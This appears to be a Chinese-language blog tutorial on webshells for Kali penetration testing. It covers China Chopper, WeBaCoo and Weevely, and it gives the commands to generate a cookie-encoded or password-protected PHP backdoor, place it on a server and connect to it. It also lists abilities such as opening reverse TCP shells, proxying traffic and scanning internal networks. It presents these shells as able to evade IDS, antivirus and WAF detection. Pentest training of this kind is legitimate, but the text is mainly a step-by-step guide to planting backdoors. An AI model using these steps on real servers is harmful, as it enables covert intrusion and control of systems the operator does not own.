首页 网络安全 渗透测试 查看内容

Kali渗透测试之WebShell

2022-8-29 14:52 2184 0

摘要: 之前我们介绍过一句话的webshell 中国菜刀 可能被IDS、AV、WAF、扫描器软件发现查杀 中国菜刀 下载好了之后,复制这个代码去服务器 之后运行客户端程序并添加服务器地址 然后双击就可以正常连接了 ...
关键词: 连接 服务器 之后 可以 命令 密码 WeBaCoo Weevely 菜刀 php

  • 之前我们介绍过一句话的webshell
  • 中国菜刀
  • 可能被IDS、AV、WAF、扫描器软件发现查杀


中国菜刀

  • 下载好了之后,复制这个代码去服务器


  • 之后运行客户端程序并添加服务器地址


  • 然后双击就可以正常连接了




WeBaCoo(Web Backdoor Cookie)

    • 类终端的shell
    • 编码通信内容通过cookie头传输,隐蔽性较强
    • cm:base64编码的命令
    • cn:服务器用于返回数据
    • cp:返回信息定界符

生成服务端

webacoo -g -o a.php


客户端去连接,可以正常连接;

webacoo -t -u http://IP/a.php


  • 当然他还有其他很多的命令,自己去试试吧


Weevely

  • 隐蔽的类终端PHP Webshell
  • 30多个管理模块
    • 执行系统命令、浏览文件系统
    • 检查服务器常见配置错误
    • 创建正向、反向TCP SHELL连接
    • 通过目标计算机代理HTTP流量
    • 从目标计算机进行端口扫描,渗透内网
  • 支持连接密码


首先需要安装一下库文件

  • 首先访问这个网站https://pypi.python.org/pypi/PySocks/


  • 之后解压出来,然后./setup.py install


  • 生成服务端并传入至服务器中
weevely generate 123456 wee.php    (132456为连接密码)


  • 之后可以连接了
weevely http://192.168.0.119/wee.php 123456 (123456就是设置的密码)


  • 当然还有很多的可利用模块,大家可以试试

本文出处: https://www.toutiao.com/article/7137114666962076199/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部